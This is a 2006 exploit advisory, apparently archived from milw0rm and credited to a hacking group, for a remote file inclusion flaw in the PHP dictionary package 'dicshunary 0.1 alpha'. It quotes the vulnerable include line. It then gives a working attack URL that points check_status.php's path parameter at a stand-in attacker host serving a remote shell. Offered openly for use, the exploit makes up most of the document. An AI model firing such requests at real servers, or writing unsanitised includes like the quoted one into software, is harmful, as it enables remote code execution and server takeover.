39 lines
No EOL
1.2 KiB
Text
39 lines
No EOL
1.2 KiB
Text
**********************************************************************************************************
|
|
WwW.Deltahacking.NeT (Priv8 Site)
|
|
WwW.Deltahacking.Ir (Public Site)
|
|
**********************************************************************************************************
|
|
|
|
* Portal Name :dicshunary 0.1 alpha
|
|
|
|
* Class = Remote File Inclusion ;
|
|
|
|
* Download =http://puzzle.dl.sourceforge.net/sourceforge/dicshunary/dicshunary_0.1alpha.tar.gz
|
|
|
|
* Found by = DeltahackingTEAM
|
|
|
|
* User In Delta Team (TAnha & Dr.Pantagon )
|
|
|
|
--------------------------------------------------------------------------------------------
|
|
|
|
--------------
|
|
- Vulnerable Code
|
|
|
|
include_once($dicshunary_root_path.'common.inc');
|
|
|
|
++++++++++++++++++++++++++++++++++++++++++++
|
|
|
|
- Exploit:
|
|
|
|
|
|
http://[target]/[path]/check_status.php?dicshunary_root_path=http://evilsite.com/shell?
|
|
|
|
|
|
--------------------------------------------------------------------------------------------
|
|
|
|
--------------
|
|
|
|
SP TNX : Tanha, Dr.Trojan , Hiv++ , D_7j ,Vpc,
|
|
|
|
**********************************************************************************************************
|
|
|
|
# milw0rm.com [2006-11-17] |